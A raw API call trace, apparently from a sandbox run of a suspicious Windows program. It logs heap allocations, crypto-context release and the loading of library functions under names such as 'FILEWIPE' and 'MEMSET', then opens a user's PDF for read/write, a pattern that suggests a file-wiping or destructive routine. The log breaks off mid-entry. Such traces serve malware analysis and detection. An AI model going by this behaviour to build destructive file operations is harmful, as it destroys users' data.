0 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.351] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.351] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0173.351] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.351] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.351] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.351] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0173.351] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.351] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.352] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.352] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.352] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.352] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0173.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.352] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0173.352] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.353] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0173.353] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.353] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0173.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.353] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.353] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.354] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.354] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.354] FreeLibrary (hLibModule=0x74f20000) returned 1 [0173.354] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.354] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.354] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.354] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0173.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.355] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0173.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.357] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0173.357] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0173.357] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0173.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.358] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0173.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb702510, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0x2ad3e090, ftLastAccessTime.dwHighDateTime=0x1d5dc0a, ftLastWriteTime.dwLowDateTime=0x2ad3e090, ftLastWriteTime.dwHighDateTime=0x1d5dc0a, nFileSizeHigh=0x0, nFileSizeLow=0xce08, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="XdF9hOa.pdf", cAlternateFileName="")) returned 0x90ae18 [0173.359] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0173.359] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0173.359] CharLowerBuffW (in: lpsz="byte[52744]", cchLength=0xb | out: lpsz="byte[52744]") returned 0xb [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0173.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0173.361] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.361] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0173.361] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0173.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0173.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.361] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0173.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.361] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2688 [0173.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2688, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0173.362] FreeLibrary (hLibModule=0x75c90000) returned 1 [0173.362] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.362] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.362] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0173.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.363] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.364] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0173.364] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xdf9hoa.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6be18 | out: hHeap=0x8a0000) returned 1 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.365] HeapFree (in: 